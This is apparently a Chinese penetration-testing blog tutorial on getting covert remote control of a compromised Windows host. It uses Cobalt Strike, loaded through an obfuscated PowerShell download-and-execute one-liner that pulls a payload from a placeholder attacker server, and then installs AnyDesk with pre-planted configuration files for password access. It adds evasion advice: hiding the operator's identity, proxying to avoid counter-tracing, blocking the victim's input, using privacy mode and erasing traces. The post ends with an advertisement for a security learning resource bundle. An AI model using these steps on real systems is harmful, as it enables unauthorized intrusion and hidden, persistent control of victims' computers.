在进行内网渗透的时候,如果目标机器出网,但是有时候目标3389端口未开放也就表示我们无法使用远程桌面进行连接。但是依然有很多第三方远程控制软件可以帮助我们,例如Teamviewer或者AnyDesk。
本片文章我们将使用Cobalt Strike配合AnyDesk进行演示。
首先上线cs
这里我们使用powershell上线,首先我们使用Payload Generator生成一个ps1脚本
然后在目标机器上执行:(使用管理员权限执行)
powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''https://www.xxxx.tk:8443/payload.ps1'')'.Replace('11','adString');IEX ($a+$b)"
可以看到上线成功
下载anydesk
获取到权限以后 ,我们在目标机器上下载anydesk:
powershell (New-Object System.Net.WebClient).DownloadFile(“https://download.anydesk.com/AnyDesk.exe","C:\anydesk.exe")
我们看到anydesk已经下载到了目标主机上,这是我们先不急着打开,我们先添加他的配置文件
生成配置文件
如果我们直接打开的话,我们不知道他的id号,也不能通过密码进行登录,更不可能直接修改,这时候我们可以先在本机生成一个配置文件,然后将配置文件拷过去。
所以我们先下载一个anydesk到本地,然后打开它,记住他的id号,例如我的就是802691146
我们为自主访问设置密码在这里随便设置一个密码
然后我们将anydesk彻底关闭,退出的时候选择不安装anydesk
他会自动将配置文件生成在
%appdata%\AnyDesk
,也就是
C:\Users\你的用户名\AppData\Roaming\AnyDesk
我们将这四个文件保存下来,然后上传到目标主机的对应位置,
务必记得保存到别处以后把本机的配置文件删除
上传配置文件并启动anydesk
在这个路径下新建一个名为AnyDesk
的文件夹
然后在此文件夹下上传刚刚保存的四个配置文件
然后启动anydesk
连接测试,提示输入密码
成功连接
注意事项
这里说一下避免踩坑的几个点:
记的在这里一定要把用户名称改成自定义,否则在那边直接会显示你的用户名 \手动狗头
生成配置文件后将配置文件保存后记的删除配置文件,下次你重新启动anydesk的时候会自动生成并自动重新分配一个id
目标主机必须有管理员权限
必要时可以可以设置代理,避免让对方反制自己(由于我是用的是clash,直接代理的本地7890端口)
控制目标机器后可以 关闭目标机器的anydesk ,但实际不会断开连接,且连接结束后会自动结束目标机器的anydesk进程,便于消除痕迹
控制目标机器后记的开启 禁止用户输入 和 启动隐私模式
控制目标机器后记的开启 禁止用户输入 和 启动隐私模式
[外链图片转存中…(img-vFR41jmK-1692690804899)]
最后
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
干货主要有:
①1000+CTF历届题库(主流和经典的应该都有了)
②CTF技术文档(最全中文版)
③项目源码(四五十个有趣且经典的练手项目及源码)
④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)
⑤ 网络安全学习路线图(告别不入流的学习)
⑥ CTF/渗透测试工具镜像文件大全
⑦ 2023密码学/隐身术/PWN技术手册大全
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
扫码领取